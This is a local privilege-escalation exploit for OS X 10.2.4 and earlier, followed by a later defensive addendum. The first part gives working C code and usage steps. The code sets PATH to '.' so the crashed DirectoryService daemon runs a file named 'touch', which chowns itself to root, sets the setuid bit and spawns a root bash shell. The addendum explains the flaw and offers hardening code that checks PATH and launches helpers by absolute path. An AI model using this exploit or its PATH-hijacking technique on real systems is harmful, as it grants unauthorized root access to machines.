OS X <= 10.2.4 DirectoryService local root PATH exploit

DirectoryService must be crashed prior to execution, per
@stake advisory.  If you discover how to crash DirectoryService
e-mail me at   [Neeko Oni]

Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.

bash$ ./touch
*bunch of stuff here*
euid is root.



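#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
    char           *ORIGPATH;
    int             temp;

    if (argc < 2) {
        /* No arguments: started by the user, before or after the setuid bit is set. */
        if (geteuid() == 0) {
            printf("euid is root.\n");
            execl("/bin/bash", "bash", NULL);
        }
        /* Copy PATH before changing it; strcpy() into an unallocated pointer is undefined. */
        ORIGPATH = strdup(getenv("PATH"));
        printf("Original path: %s\n", ORIGPATH);
        setenv("PATH", ".", 1);
        printf("New path: %s\n", getenv("PATH"));
        printf("Executing DirectoryService with false PATH...\n");
        if (fork() == 0) {
            execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
        }
        printf("Forked DirectoryService, pausing before shell exec...\n");
        printf("Cross your fingers.\n");
        setenv("PATH", ORIGPATH, 1);
        printf("Path restored: %s\n", getenv("PATH"));
        execl("./touch", "touch", NULL);
    }
    /* With arguments: invoked as 'touch' by DirectoryService through the modified PATH. */
    system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
    return 0;
}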
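
The code above depends on a root-privileged program running a helper named 'touch' through the PATH it inherits from the caller. The following C sketch is an added example, not code from the original page or from DirectoryService itself: it shows a check for PATH entries that resolve against the working directory and a helper launcher that avoids PATH lookup entirely. The function names and the fixed PATH value are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Count PATH entries that resolve against the caller's working directory:
 * empty entries, "." and any other entry that does not start with '/'. */
int unsafe_path_entries(const char *path)
{
    int unsafe = 0;
    if (path == NULL)
        return 0;
    for (const char *p = path;;) {
        size_t len = strcspn(p, ":");
        if (len == 0 || p[0] != '/')
            unsafe++;
        if (p[len] == '\0')
            return unsafe;
        p += len + 1;
    }
}

/* Hypothetical helper launcher for a privileged daemon: absolute path only,
 * no shell, fixed environment. Returns the helper's exit status or -1. */
int run_helper_hardened(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                          /* refuse PATH-relative names */
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);  /* execve() never searches PATH */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "sh", "-c", "exit 0", NULL };  /* constructed sample */
    printf("unsafe entries in \".\": %d\n", unsafe_path_entries("."));
    printf("bare name: %d\n", run_helper_hardened("touch", argv));
    printf("absolute path: %d\n", run_helper_hardened("/bin/sh", argv));
    return 0;
}
```

A setuid or root daemon that launches helpers this way ignores the caller's PATH, so a PATH of "." has no effect on which binary runs.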


